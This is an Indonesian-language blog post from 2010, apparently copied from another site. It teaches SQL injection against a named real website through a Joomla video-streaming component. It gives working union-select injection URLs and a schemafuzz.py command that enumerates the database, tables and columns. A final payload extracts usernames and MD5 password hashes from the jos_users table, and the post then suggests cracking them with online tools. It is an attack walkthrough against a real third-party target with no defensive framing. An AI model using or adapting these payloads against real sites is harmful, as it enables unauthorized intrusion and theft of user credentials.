Saturday, October 2, 2010

SQL Injection With Schemafuzz

SQL Injection mungkin bukan kata yang aneh lagi bagi para orang yang suka hacking khususnya website, Sebelumnya artikel ini ditujukan untuk anda yang tau tentang perintah SQL walaupun dikit. Oke lanjut kli ini kita akan mencoba teknik SQL Injection menggunakkan python code yaitu schemafuzz.py untuk download silahkan Klik Disini. Ingat karena ini merupakan python code jadi kita perlu menginstall python untuk menjalankannya untuk download program python silahkan langsung ke website python.org atau Klik disini, silahkan sesuaikan dengan sistem Operasi yang anda pakai.

Hmm

sori sebelumnya artikel w ambil dari sini

http://www.caturla.web.id/2008/11/sql-injection-with-schemafuzz.htm

Oke langsung aja y, setelah selesai download pythonnya langsung install aja, kemudian jalankan lewat DOS caranya masuk ke
start menu -> Run -> cmd atau command.
selanjutnya pindah ke directory python yang sudah kita install ketik cd\ lalu enter, ketikan cd Python26 -> Enter sesuaikan dengan versi python yang dipakai. kemudian copy schemafuzz.py yang sudah kita download tadi kedalam directory python.
langkah selanjutnya adalah cari target sasaran kali ini kita akan coba dengan target http://www.windsurfing.gr kita cari dulu SQL vulnerable nya, kita dapatkan pada komponent com_xsstream-dm component untuk streaming video, sekarang coba masukan perintah SQL

http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
lihat pesan kesalahannya dibawah ada angka 3
Setelah kita dapat kode kesalahan lanjutkan dengan schemafuzz.py untuk mendapatkan nama database, nama tabel dan nama kolom dalam tabel. caranya masuk ke DOS lagi terus ketikan :

C:\Python26>schemafuzz.py -u “http://www.windsurfing.grindex.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,darkc0de,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22/*”
Rubah angka 3 yang ada diatas dengan darkc0de, hasilnya yang kita dapatkan seperti ini :
untuk mempelajari schemafuzz ini silahkan buka aja helpnya ketikan : schemafuzz.py -help.
dari gambar diatas kita bisa dapatkan Nama Database, User, Versi SQL yang digunakkan, Nama Tabel dan Nama Kolom dalam tabel.
setelah kita dapatkan semua,langkah selanjutnya extract kolom dalam tabel itu.

http://www.windsurfing.gr/index.php?option=com_xsstream-dm&itemid=69&movie=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22+from+jos_users/*
hasilnya seperti ini :
dapat dech username dan password walaupun masih dalam bentuk MD5, selanjutnya cari sendiri y tool untuk MD5 decrypt cari aja di google. oke sekian dulu mudah-mudahan bermanfaat.

No comments:

Post a Comment